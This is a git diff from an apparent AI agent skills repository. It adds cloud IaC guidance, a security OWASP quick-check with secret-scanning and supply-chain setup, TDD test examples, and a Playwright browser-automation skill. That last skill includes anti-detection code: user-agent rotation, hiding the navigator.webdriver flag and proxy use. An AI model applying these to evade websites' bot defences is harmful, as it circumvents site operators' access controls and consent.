                "target": args.target,
                "scope": args.scope,
                "source_path": args.source,
                "generated_at": datetime.now().isoformat(),
                "checklist_count": len(checklist),
                "source_findings_count": len(source_findings),
            },
            "checklist": [asdict(c) for c in checklist],
            "source_findings": [asdict(f) for f in source_findings],
        }
        print(json.dumps(payload, indent=2))
    else:
        print(format_checklist_text(checklist))
        if source_findings:
            print(format_findings_text(source_findings))
        elif args.source:
            print("\nNo vulnerability patterns detected in source code.")
    # Non-zero exit signals CI consumers that serious issues were found.
    if any(f.severity in ("critical", "high") for f in source_findings):
        sys.exit(1)


if __name__ == "__main__":
    main()

View File

@@ -270,6 +270,54 @@ kubectl get pods -n production -l app=myapp
curl -sf https://app.example.com/healthz || echo "ROLLBACK FAILED — escalate"
```
## Multi-Cloud Cross-References
Use these companion skills for cloud-specific deep dives:
| Skill | Cloud | Use When |
|-------|-------|----------|
| **aws-solution-architect** | AWS | ECS/EKS, Lambda, VPC design, cost optimization |
| **azure-cloud-architect** | Azure | AKS, App Service, Virtual Networks, Azure DevOps |
| **gcp-cloud-architect** | GCP | GKE, Cloud Run, VPC, Cloud Build |
**Multi-cloud vs single-cloud decision:**
- **Single-cloud** (default) — lower operational complexity, deeper managed-service integration, better cost leverage with committed-use discounts
- **Multi-cloud** — required when mandated by compliance/data residency, acquiring companies on different clouds, or needing best-of-breed services across providers (e.g., AWS for compute + GCP for ML)
- **Hybrid** — on-prem + cloud; use when regulated workloads must stay on-prem while burst/non-sensitive workloads run in the cloud
> Start single-cloud. Add a second cloud only when there is a concrete business or compliance driver — not for theoretical redundancy.
---
## Cloud-Agnostic IaC
### Terraform / OpenTofu (Default Choice)
Terraform (or its open-source fork OpenTofu) is the recommended IaC tool for most teams:
- Single language (HCL) across AWS, Azure, GCP, and 3,000+ providers
- State management with remote backends (S3, GCS, Azure Blob)
- Plan-before-apply workflow prevents drift surprises
- Cross-reference **terraform-patterns** for module structure, state isolation, and CI/CD integration
### Pulumi (Programming Language IaC)
Choose Pulumi when the team strongly prefers TypeScript, Python, Go, or C# over HCL:
- Full programming language — loops, conditionals, unit tests native
- Same cloud provider coverage as Terraform
- Easier onboarding for dev teams that resist learning HCL
### When to Use Cloud-Native IaC
| Tool | Use When |
|------|----------|
| **CloudFormation** | AWS-only shop; need native AWS support (StackSets, Service Catalog) |
| **Bicep** | Azure-only shop; simpler syntax than ARM templates |
| **Cloud Deployment Manager** | GCP-only; rare — most GCP teams prefer Terraform |
> **Rule of thumb:** Use Terraform/OpenTofu unless you are 100% committed to a single cloud AND the cloud-native tool offers a feature Terraform cannot replicate (e.g., AWS Service Catalog integration).
---
## Troubleshooting
Check the comprehensive troubleshooting section in `references/deployment_strategies.md`.

View File

@@ -413,6 +413,89 @@ app.use((req, res, next) => {
---
## OWASP Top 10 Quick-Check
Rapid 15-minute assessment — run through each category and note pass/fail. For deep-dive testing, hand off to the **security-pen-testing** skill.
| # | Category | One-Line Check |
|---|----------|----------------|
| A01 | Broken Access Control | Verify role checks on every endpoint; test horizontal privilege escalation |
| A02 | Cryptographic Failures | Confirm TLS 1.2+ everywhere; no secrets in logs or source |
| A03 | Injection | Run parameterized query audit; check ORM raw-query usage |
| A04 | Insecure Design | Review threat model exists for critical flows |
| A05 | Security Misconfiguration | Check default credentials removed; error pages generic |
| A06 | Vulnerable Components | Run `vulnerability_assessor.py`; zero critical/high CVEs |
| A07 | Auth Failures | Verify MFA on admin; brute-force protection active |
| A08 | Software & Data Integrity | Confirm CI/CD pipeline signs artifacts; no unsigned deps |
| A09 | Logging & Monitoring | Validate audit logs capture auth events; alerts configured |
| A10 | SSRF | Test internal URL filters; block metadata endpoints (169.254.169.254) |
> **Deep dive needed?** Hand off to `security-pen-testing` for full OWASP Testing Guide coverage.
---
## Secret Scanning Tools
Choose the right scanner for each stage of your workflow:
| Tool | Best For | Language | Pre-commit | CI/CD | Custom Rules |
|------|----------|----------|:----------:|:-----:|:------------:|
| **gitleaks** | CI pipelines, full-repo scans | Go | Yes | Yes | TOML regexes |
| **detect-secrets** | Pre-commit hooks, incremental | Python | Yes | Partial | Plugin-based |
| **truffleHog** | Deep history scans, entropy | Go | No | Yes | Regex + entropy |
**Recommended setup:** Use `detect-secrets` as a pre-commit hook (catches secrets before they enter history) and `gitleaks` in CI (catches anything that slips through).
```bash
# detect-secrets pre-commit hook (.pre-commit-config.yaml)
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
# gitleaks in GitHub Actions
- name: gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITLEAKS_LICENSE: ${{ secrets.GITLEAKS_LICENSE }}
```
---
## Supply Chain Security
Protect against dependency and artifact tampering with SBOM generation, artifact signing, and SLSA compliance.
**SBOM Generation:**
- **syft** — generates SBOMs from container images or source dirs (SPDX, CycloneDX formats)
- **cyclonedx-cli** — CycloneDX-native tooling; merge multiple SBOMs for mono-repos
```bash
# Generate SBOM from container image
syft packages ghcr.io/org/app:latest -o cyclonedx-json > sbom.json
```
**Artifact Signing (Sigstore/cosign):**
```bash
# Sign a container image (keyless via OIDC)
cosign sign ghcr.io/org/app:latest
# Verify signature
cosign verify ghcr.io/org/app:latest --certificate-identity=ci@org.com --certificate-oidc-issuer=https://token.actions.githubusercontent.com
```
**SLSA Levels Overview:**
| Level | Requirement | What It Proves |
|-------|-------------|----------------|
| 1 | Build process documented | Provenance exists |
| 2 | Hosted build service, signed provenance | Tamper-resistant provenance |
| 3 | Hardened build platform, non-falsifiable provenance | Tamper-proof build |
| 4 | Two-party review, hermetic builds | Maximum supply-chain assurance |
> **Cross-references:** `security-pen-testing` (vulnerability exploitation testing), `dependency-auditor` (license and CVE audit for dependencies).
---
## Reference Documentation
| Document | Description |

View File

@@ -1,15 +1,6 @@
---
name: "tdd-guide"
description: "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects."
triggers:
- generate tests
- analyze coverage
- TDD workflow
- red green refactor
- Jest tests
- Pytest tests
- JUnit tests
- coverage report
description: "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit."
---
# TDD Guide
@@ -148,6 +139,254 @@ Additional scripts: `framework_adapter.py` (convert between frameworks), `metric
---
## Spec-First Workflow
TDD is most effective when driven by a written spec. The flow:
1. **Write or receive a spec** — stored in `specs/<feature>.md`
2. **Extract acceptance criteria** — each criterion becomes one or more test cases
3. **Write failing tests (RED)** — one test per acceptance criterion
4. **Implement minimal code (GREEN)** — satisfy each test in order
5. **Refactor** — clean up while all tests stay green
### Spec Directory Convention
```
project/
├── specs/
│ ├── user-auth.md # Feature spec with acceptance criteria
│ ├── payment-processing.md
│ └── notification-system.md
├── tests/
│ ├── test_user_auth.py # Tests derived from specs/user-auth.md
│ ├── test_payments.py
│ └── test_notifications.py
└── src/
```
### Extracting Tests from Specs
Each acceptance criterion in a spec maps to at least one test:
| Spec Criterion | Test Case |
|---------------|-----------|
| "User can log in with valid credentials" | `test_login_valid_credentials_returns_token` |
| "Invalid password returns 401" | `test_login_invalid_password_returns_401` |
| "Account locks after 5 failed attempts" | `test_login_locks_after_five_failures` |
**Tip:** Number your acceptance criteria in the spec. Reference the number in the test docstring for traceability (`# AC-3: Account locks after 5 failed attempts`).
> **Cross-reference:** See `engineering/spec-driven-workflow` for the full spec methodology, including spec templates and review checklists.
---
## Red-Green-Refactor Examples Per Language
### TypeScript / Jest
```typescript
// test/cart.test.ts
describe("Cart", () => {
describe("addItem", () => {
it("should add a new item to an empty cart", () => {
const cart = new Cart();
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 1 });
expect(cart.items).toHaveLength(1);
expect(cart.items[0].id).toBe("sku-1");
});
it("should increment quantity when adding an existing item", () => {
const cart = new Cart();
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 1 });
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 2 });
expect(cart.items).toHaveLength(1);
expect(cart.items[0].qty).toBe(3);
});
it("should throw when quantity is zero or negative", () => {
const cart = new Cart();
expect(() =>
cart.addItem({ id: "sku-1", name: "Widget", price: 9.99, qty: 0 })
).toThrow("Quantity must be positive");
});
});
});
```
### Python / Pytest (Advanced Patterns)
```python
# tests/conftest.py — shared fixtures
import pytest
from app.db import create_engine, Session
@pytest.fixture(scope="session")
def db_engine():
engine = create_engine("sqlite:///:memory:")
yield engine
engine.dispose()
@pytest.fixture
def db_session(db_engine):
session = Session(bind=db_engine)
yield session
session.rollback()
session.close()
# tests/test_pricing.py — parametrize for multiple cases
import pytest
from app.pricing import calculate_discount
@pytest.mark.parametrize("subtotal, expected_discount", [
(50.0, 0.0), # Below threshold — no discount
(100.0, 5.0), # 5% tier
(250.0, 25.0), # 10% tier
(500.0, 75.0), # 15% tier
])
def test_calculate_discount(subtotal, expected_discount):
assert calculate_discount(subtotal) == pytest.approx(expected_discount)
```
### Go — Table-Driven Tests
```go
// cart_test.go
package cart
import "testing"
func TestApplyDiscount(t *testing.T) {
tests := []struct {
name string
subtotal float64
want float64
}{
{"no discount below threshold", 50.0, 0.0},
{"5 percent tier", 100.0, 5.0},
{"10 percent tier", 250.0, 25.0},
{"15 percent tier", 500.0, 75.0},
{"zero subtotal", 0.0, 0.0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := ApplyDiscount(tt.subtotal)
if got != tt.want {
t.Errorf("ApplyDiscount(%v) = %v, want %v", tt.subtotal, got, tt.want)
}
})
}
}
```
---
## Bounded Autonomy Rules
When generating tests autonomously, follow these rules to decide when to stop and ask the user:
### Stop and Ask When
- **Ambiguous requirements** — the spec or user story has conflicting or unclear acceptance criteria
- **Missing edge cases** — you cannot determine boundary values without domain knowledge (e.g., max allowed transaction amount)
- **Test count exceeds 50** — large test suites need human review before committing; present a summary and ask which areas to prioritize
- **External dependencies unclear** — the feature relies on third-party APIs or services with undocumented behavior
- **Security-sensitive logic** — authentication, authorization, encryption, or payment flows require human sign-off on test scenarios
### Continue Autonomously When
- **Clear spec with numbered acceptance criteria** — each criterion maps directly to tests
- **Straightforward CRUD operations** — create, read, update, delete with well-defined models
- **Well-defined API contracts** — OpenAPI spec or typed interfaces available
- **Pure functions** — deterministic input/output with no side effects
- **Existing test patterns** — the codebase already has similar tests to follow
---
## Property-Based Testing
Property-based testing generates random inputs to verify invariants instead of relying on hand-picked examples. Use it when the input space is large and the expected behavior can be described as a property.
### Python — Hypothesis
```python
from hypothesis import given, strategies as st
from app.serializers import serialize, deserialize
@given(st.text())
def test_roundtrip_serialization(data):
"""Serialization followed by deserialization returns the original."""
assert deserialize(serialize(data)) == data
@given(st.integers(), st.integers())
def test_addition_is_commutative(a, b):
assert a + b == b + a
```
### TypeScript — fast-check
```typescript
import fc from "fast-check";
import { encode, decode } from "./codec";
test("encode/decode roundtrip", () => {
fc.assert(
fc.property(fc.string(), (input) => {
expect(decode(encode(input))).toBe(input);
})
);
});
```
### When to Use Property-Based Over Example-Based
| Use Property-Based | Example |
|-------------------|---------|
| Data transformations | Serialize/deserialize roundtrips |
| Mathematical properties | Commutativity, associativity, idempotency |
| Encoding/decoding | Base64, URL encoding, compression |
| Sorting and filtering | Output is sorted, length preserved |
| Parser correctness | Valid input always parses without error |
---
## Mutation Testing
Mutation testing modifies your production code (creates "mutants") and checks whether your tests catch the changes. If a mutant survives (tests still pass), your tests have a gap that coverage alone cannot reveal.
### Tools
| Language | Tool | Command |
|----------|------|---------|
| TypeScript/JavaScript | **Stryker** | `npx stryker run` |
| Python | **mutmut** | `mutmut run --paths-to-mutate=src/` |
| Java | **PIT** | `mvn org.pitest:pitest-maven:mutationCoverage` |
### Why Mutation Testing Matters
- **100% line coverage != good tests** — coverage tells you code was executed, not that it was verified
- **Catches weak assertions** — tests that run code but assert nothing meaningful
- **Finds missing boundary tests** — mutants that change `<` to `<=` expose off-by-one gaps
- **Quantifiable quality metric** — mutation score (% mutants killed) is a stronger signal than coverage %
**Recommendation:** Run mutation testing on critical paths (auth, payments, data processing) even if overall coverage is high. Target 85%+ mutation score on P0 modules.
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering/spec-driven-workflow` | Spec → acceptance criteria → test extraction pipeline |
| `engineering-team/focused-fix` | Phase 5 (Verify) uses TDD to confirm the fix with a regression test |
| `engineering-team/senior-qa` | Broader QA strategy; TDD is one layer in the test pyramid |
| `engineering-team/code-reviewer` | Review generated tests for assertion quality and coverage completeness |
| `engineering-team/senior-fullstack` | Project scaffolders include testing infrastructure compatible with TDD workflows |
---
## Limitations
| Scope | Details |

View File

@@ -1,6 +1,6 @@
{
"name": "engineering-advanced-skills",
"description": "31 advanced engineering skills: agent designer, agent workflow designer, AgentHub, RAG architect, database designer, migration architect, observability designer, dependency auditor, release manager, API reviewer, CI/CD pipeline builder, MCP server builder, skill security auditor, performance profiler, Helm chart builder, Terraform patterns, focused-fix, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"description": "33 advanced engineering skills: agent designer, agent workflow designer, AgentHub, RAG architect, database designer, migration architect, observability designer, dependency auditor, release manager, API reviewer, CI/CD pipeline builder, MCP server builder, skill security auditor, performance profiler, Helm chart builder, Terraform patterns, focused-fix, browser-automation, spec-driven-workflow, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"version": "2.1.2",
"author": {
"name": "Alireza Rezvani",

View File

@@ -0,0 +1,564 @@
---
name: "browser-automation"
description: "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing — use playwright-pro for that."
---
# Browser Automation - POWERFUL
## Overview
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale.
**When to use this skill:**
- Scraping structured data from websites (tables, listings, search results)
- Automating multi-step browser workflows (login, fill forms, download files)
- Capturing screenshots or PDFs of web pages
- Extracting data from SPAs and JavaScript-heavy sites
- Building repeatable browser-based data pipelines
**When NOT to use this skill:**
- Writing browser tests or E2E test suites — use **playwright-pro** instead
- Testing API endpoints — use **api-test-suite-builder** instead
- Load testing or performance benchmarking — use **performance-profiler** instead
**Why Playwright over Selenium or Puppeteer:**
- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions
- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes
- **Network interception** — block ads, mock responses, capture API calls natively
- **Browser contexts** — isolated sessions without spinning up new browser instances
- **Codegen** — `playwright codegen` records your actions and generates scripts
- **Async-first** — Python async/await for high-throughput scraping
## Core Competencies
### 1. Web Scraping Patterns
#### DOM Extraction with CSS Selectors
CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance.
**Selector priority (most to least reliable):**
1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns
2. `#id` selectors — unique but may change between deploys
3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes
4. Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules)
5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes
**Compound selectors for precision:**
```python
# Product cards within a specific container
page.query_selector_all("div.search-results > article.product-card")
# Price inside a product card (scoped)
card.query_selector("span[data-field='price']")
# Links with specific text content
page.locator("a", has_text="Next Page")
```
#### XPath for Complex Traversal
Use XPath only when CSS cannot express the relationship:
```python
# Find element by text content (XPath strength)
page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]")
# Navigate up the DOM tree
page.locator("//span[@class='price']/ancestor::div[@class='product']")
```
#### Pagination Patterns
- **Next-button pagination**: Click "Next" until disabled or absent
- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL
- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change
- **Load-more button**: Click button, wait for DOM mutation, repeat
#### Infinite Scroll Handling
```python
async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500):
    """Scroll an infinite-scroll page until its height stops growing.

    Args:
        page: Playwright page (or any object with async evaluate/wait_for_timeout).
        max_scrolls: hard cap on scroll iterations.
        pause_ms: wait after each scroll so lazy content can load.

    Returns:
        The number of scrolls actually performed. (The original returned
        ``i + 1``, which over-counted by one on the final no-op height check
        and raised UnboundLocalError when max_scrolls == 0.)
    """
    previous_height = 0
    scrolls = 0
    for _ in range(max_scrolls):
        current_height = await page.evaluate("document.body.scrollHeight")
        if current_height == previous_height:
            break  # no new content appeared since the last scroll
        await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
        await page.wait_for_timeout(pause_ms)
        previous_height = current_height
        scrolls += 1
    return scrolls
```
### 2. Form Filling & Multi-Step Workflows
#### Login Flows
```python
async def login(page, url, username, password):
    """Log in through a standard username/password form.

    Assumes inputs named 'username' and 'password' and a submit button;
    waits for the post-login redirect to a URL containing /dashboard.
    """
    await page.goto(url)
    await page.fill("input[name='username']", username)
    await page.fill("input[name='password']", password)
    await page.click("button[type='submit']")
    # Wait for navigation to complete (post-login redirect)
    await page.wait_for_url("**/dashboard**")
```
#### Multi-Page Forms
Break multi-step forms into discrete functions per step. Each function:
1. Fills the fields for that step
2. Clicks the "Next" or "Continue" button
3. Waits for the next step to load (URL change or DOM element)
```python
async def fill_step_1(page, data):
    """Fill step 1 (name + country) of the multi-page form and advance."""
    await page.fill("#first-name", data["first_name"])
    await page.fill("#last-name", data["last_name"])
    await page.select_option("#country", data["country"])
    await page.click("button:has-text('Continue')")
    # Block until step 2's form is present before returning.
    await page.wait_for_selector("#step-2-form")
async def fill_step_2(page, data):
    """Fill step 2 (address) of the multi-page form and advance."""
    await page.fill("#address", data["address"])
    await page.fill("#city", data["city"])
    await page.click("button:has-text('Continue')")
    # Block until step 3's form is present before returning.
    await page.wait_for_selector("#step-3-form")
```
#### File Uploads
```python
# Single file
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
# Multiple files
await page.set_input_files("input[type='file']", [
"/path/to/file1.pdf",
"/path/to/file2.pdf"
])
# Drag-and-drop upload zones (no visible input element)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
#### Dropdown and Select Handling
```python
# Native <select> element
await page.select_option("#country", value="US")
await page.select_option("#country", label="United States")
# Custom dropdown (div-based)
await page.click("div.dropdown-trigger")
await page.click("div.dropdown-option:has-text('United States')")
```
### 3. Screenshot & PDF Capture
#### Screenshot Strategies
```python
# Full page (scrolls automatically)
await page.screenshot(path="full-page.png", full_page=True)
# Viewport only (what's visible)
await page.screenshot(path="viewport.png")
# Specific element
element = page.locator("div.chart-container")
await element.screenshot(path="chart.png")
# With custom viewport for consistency
context = await browser.new_context(viewport={"width": 1920, "height": 1080})
```
#### PDF Generation
```python
# Only works in Chromium
await page.pdf(
path="output.pdf",
format="A4",
margin={"top": "1cm", "right": "1cm", "bottom": "1cm", "left": "1cm"},
print_background=True
)
```
#### Visual Regression Baselines
Take screenshots at known states and compare pixel-by-pixel. Store baselines in version control. Use naming conventions: `{page}_{viewport}_{state}.png`.
### 4. Structured Data Extraction
#### Tables to JSON
```python
async def extract_table(page, selector):
    """Extract the <table> under `selector` into a list of row dicts.

    Headers are read from `thead th`; each `tbody tr` becomes one dict
    keyed by those headers.
    """
    headers = await page.eval_on_selector_all(
        f"{selector} thead th",
        "elements => elements.map(e => e.textContent.trim())"
    )
    rows = await page.eval_on_selector_all(
        f"{selector} tbody tr",
        """rows => rows.map(row => {
            return Array.from(row.querySelectorAll('td'))
                .map(cell => cell.textContent.trim())
        })"""
    )
    # NOTE: zip() silently truncates when a row has more or fewer cells
    # than there are headers.
    return [dict(zip(headers, row)) for row in rows]
```
#### Listings to Arrays
```python
async def extract_listings(page, container_sel, field_map):
    """Extract one record per container element.

    field_map maps output field names to CSS selectors; a selector suffixed
    with ``::attr(name)`` extracts that attribute instead of text, e.g.
    {"title": "h3.title", "price": "span.price", "url": "a::attr(href)"}.
    Fields whose selector matches nothing yield None.
    """
    records = []
    for card in await page.query_selector_all(container_sel):
        record = {}
        for field, sel in field_map.items():
            if "::attr(" in sel:
                attr_sel, attr_name = sel.split("::attr(")
                attr_name = attr_name.rstrip(")")
                target = await card.query_selector(attr_sel)
                record[field] = await target.get_attribute(attr_name) if target else None
            else:
                target = await card.query_selector(sel)
                record[field] = (await target.text_content()).strip() if target else None
        records.append(record)
    return records
```
#### Nested Data Extraction
For threaded content (comments with replies), use recursive extraction:
```python
async def extract_comments(page, parent_selector):
    """Recursively extract threaded comments (author, text, nested replies).

    `page` may be a Page or an ElementHandle — the recursion passes the
    comment element itself, and both support query_selector_all.

    Improvement over the original: comments missing a `.comment-body` or
    `.author` child no longer raise AttributeError; they yield "" instead.
    """
    comments = []
    elements = await page.query_selector_all(f"{parent_selector} > .comment")
    for el in elements:
        body_el = await el.query_selector(".comment-body")
        author_el = await el.query_selector(".author")
        # Guard against malformed comment nodes; text_content() may also return None.
        text = ((await body_el.text_content()) or "") if body_el else ""
        author = ((await author_el.text_content()) or "") if author_el else ""
        replies = await extract_comments(el, ".replies")
        comments.append({
            "author": author.strip(),
            "text": text.strip(),
            "replies": replies
        })
    return comments
```
### 5. Cookie & Session Management
#### Save and Restore Sessions
```python
import json
# Save cookies after login
cookies = await context.cookies()
with open("session.json", "w") as f:
json.dump(cookies, f)
# Restore session in new context
with open("session.json", "r") as f:
cookies = json.load(f)
context = await browser.new_context()
await context.add_cookies(cookies)
```
#### Storage State (Cookies + Local Storage)
```python
# Save full state (cookies + localStorage + sessionStorage)
await context.storage_state(path="state.json")
# Restore full state
context = await browser.new_context(storage_state="state.json")
```
**Best practice:** Save state after login, reuse across scraping sessions. Check session validity before starting a long job — make a lightweight request to a protected page and verify you are not redirected to login.
### 6. Anti-Detection Patterns
Modern websites detect automation through multiple vectors. Address all of them:
#### User Agent Rotation
Never use the default Playwright user agent. Rotate through real browser user agents:
```python
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
```
#### Viewport and Screen Size
Set realistic viewport dimensions. Playwright's default viewport (1280x720) is a well-known automation fingerprint:
```python
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
screen={"width": 1920, "height": 1080},
user_agent=random.choice(USER_AGENTS),
)
```
#### WebDriver Flag Removal
Playwright sets `navigator.webdriver = true`. Remove it:
```python
await page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
```
#### Request Throttling
Add human-like delays between actions:
```python
import random
async def human_delay(min_ms=500, max_ms=2000):
    """Sleep a random, human-like interval between min_ms and max_ms.

    Fix: the original awaited ``page.wait_for_timeout`` on a global `page`
    that is not in scope here (NameError unless a global happened to exist);
    asyncio.sleep removes the hidden dependency.
    """
    import asyncio  # local import keeps this snippet self-contained
    delay = random.randint(min_ms, max_ms)
    await asyncio.sleep(delay / 1000)
```
#### Proxy Support
```python
browser = await playwright.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
# Or per-context:
context = await browser.new_context(
proxy={"server": "http://proxy.example.com:8080",
"username": "user", "password": "pass"}
)
```
### 7. Dynamic Content Handling
#### SPA Rendering
SPAs render content client-side. Wait for the actual content, not the page load:
```python
await page.goto(url)
# Wait for the data to render, not just the shell
await page.wait_for_selector("div.product-list article", state="attached")
```
#### AJAX / Fetch Waiting
Intercept and wait for specific API calls:
```python
async with page.expect_response("**/api/products*") as response_info:
await page.click("button.load-more")
response = await response_info.value
data = await response.json() # You can use the API data directly
```
#### Shadow DOM Traversal
```python
# Playwright pierces open Shadow DOM automatically with >>
await page.locator("custom-element >> .inner-class").click()
```
#### Lazy-Loaded Images
Scroll elements into view to trigger lazy loading:
```python
images = await page.query_selector_all("img[data-src]")
for img in images:
await img.scroll_into_view_if_needed()
await page.wait_for_timeout(200)
```
### 8. Error Handling & Retry Logic
#### Retry Decorator Pattern
```python
import asyncio
async def with_retry(coro_factory, max_retries=3, backoff_base=2):
    """Await the coroutine produced by coro_factory, retrying on any exception.

    Makes up to max_retries attempts; waits backoff_base ** attempt seconds
    between attempts and re-raises the last failure.
    """
    last_attempt = max_retries - 1
    for attempt in range(max_retries):
        try:
            return await coro_factory()
        except Exception as exc:
            if attempt == last_attempt:
                raise
            pause = backoff_base ** attempt
            print(f"Attempt {attempt + 1} failed: {exc}. Retrying in {pause}s...")
            await asyncio.sleep(pause)
```
#### Handling Common Failures
```python
from playwright.async_api import TimeoutError as PlaywrightTimeout
try:
await page.click("button.submit", timeout=5000)
except PlaywrightTimeout:
# Element did not appear — page structure may have changed
# Try fallback selector
await page.click("[type='submit']", timeout=5000)
except Exception as e:
# Network error, browser crash, etc.
await page.screenshot(path="error-state.png")
raise
```
#### Rate Limit Detection
```python
async def check_rate_limit(response):
    """If `response` is HTTP 429, sleep for the advertised Retry-After.

    Returns True when a rate limit was hit (after waiting), False otherwise.

    Fix: Retry-After may be an HTTP-date rather than delta-seconds; the
    original ``int()`` call raised ValueError in that case. Non-numeric
    values now fall back to a 60-second wait.
    """
    if response.status == 429:
        retry_after = response.headers.get("retry-after", "60")
        try:
            wait_seconds = int(retry_after)
        except ValueError:
            wait_seconds = 60  # HTTP-date or garbage — use a safe default
        print(f"Rate limited. Waiting {wait_seconds}s...")
        await asyncio.sleep(wait_seconds)
        return True
    return False
```
## Workflows
### Workflow 1: Single-Page Data Extraction
**Scenario:** Extract product data from a single page with JavaScript-rendered content.
**Steps:**
1. Launch browser in headed mode during development (`headless=False`), switch to headless for production
2. Navigate to URL and wait for content selector
3. Extract data using `query_selector_all` with field mapping
4. Validate extracted data (check for nulls, expected types)
5. Output as JSON
```python
async def extract_single_page(url, selectors):
    """Scrape one JS-rendered page and return its listing data.

    selectors: {"container": <css>, "fields": {name: <css>}} — consumed by
    extract_listings().
    """
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        context = await browser.new_context(
            viewport={"width": 1920, "height": 1080},
            user_agent="Mozilla/5.0 ..."  # placeholder — supply a full, current UA
        )
        page = await context.new_page()
        # networkidle: wait for network activity to settle so SPA content exists
        await page.goto(url, wait_until="networkidle")
        data = await extract_listings(page, selectors["container"], selectors["fields"])
        await browser.close()
        return data
```
### Workflow 2: Multi-Page Scraping with Pagination
**Scenario:** Scrape search results across 50+ pages.
**Steps:**
1. Launch browser with anti-detection settings
2. Navigate to first page
3. Extract data from current page
4. Check if "Next" button exists and is enabled
5. Click next, wait for new content to load (not just navigation)
6. Repeat until no next page or max pages reached
7. Deduplicate results by unique key
8. Write output incrementally (don't hold everything in memory)
```python
async def scrape_paginated(base_url, selectors, max_pages=100):
    """Scrape listing data across paginated results, up to max_pages pages.

    selectors must provide "container" and "fields" (see extract_listings)
    plus "next_button" (locator for the next-page control).
    """
    all_data = []
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        page = await (await browser.new_context()).new_page()
        await page.goto(base_url)
        for page_num in range(max_pages):
            items = await extract_listings(page, selectors["container"], selectors["fields"])
            all_data.extend(items)
            # Stop when there is no next-page control or it is disabled.
            next_btn = page.locator(selectors["next_button"])
            if await next_btn.count() == 0 or await next_btn.is_disabled():
                break
            await next_btn.click()
            # Wait for the new page's content, not just navigation.
            await page.wait_for_selector(selectors["container"])
            await human_delay(800, 2000)  # polite, human-like pause between pages
        await browser.close()
        return all_data
```
### Workflow 3: Authenticated Workflow Automation
**Scenario:** Log into a portal, navigate a multi-step form, download a report.
**Steps:**
1. Check for existing session state file
2. If no session, perform login and save state
3. Navigate to target page using saved session
4. Fill multi-step form with provided data
5. Wait for download to trigger
6. Save downloaded file to target directory
```python
async def authenticated_workflow(credentials, form_data, download_dir):
    """Log in (reusing a saved session when possible), complete a multi-step
    form, and save the resulting report download.

    credentials: {"url", "user", "pass"}. form_data: fields consumed by the
    fill_step_* helpers plus "target_url". Requires `os` to be imported.
    """
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        state_file = "session_state.json"
        # Restore or create session
        if os.path.exists(state_file):
            context = await browser.new_context(storage_state=state_file)
        else:
            context = await browser.new_context()
            page = await context.new_page()
            await login(page, credentials["url"], credentials["user"], credentials["pass"])
            # Persist cookies + storage so later runs can skip the login step.
            await context.storage_state(path=state_file)
        page = await context.new_page()
        await page.goto(form_data["target_url"])
        # Fill form steps
        for step_fn in [fill_step_1, fill_step_2]:
            await step_fn(page, form_data)
        # Handle download: register the expectation before clicking the trigger.
        async with page.expect_download() as dl_info:
            await page.click("button:has-text('Download Report')")
        download = await dl_info.value
        await download.save_as(os.path.join(download_dir, download.suggested_filename))
        await browser.close()
```
## Tools Reference
| Script | Purpose | Key Flags | Output |
|--------|---------|-----------|--------|
| `scraping_toolkit.py` | Generate Playwright scraping script skeleton | `--url`, `--selectors`, `--paginate`, `--output` | Python script or JSON config |
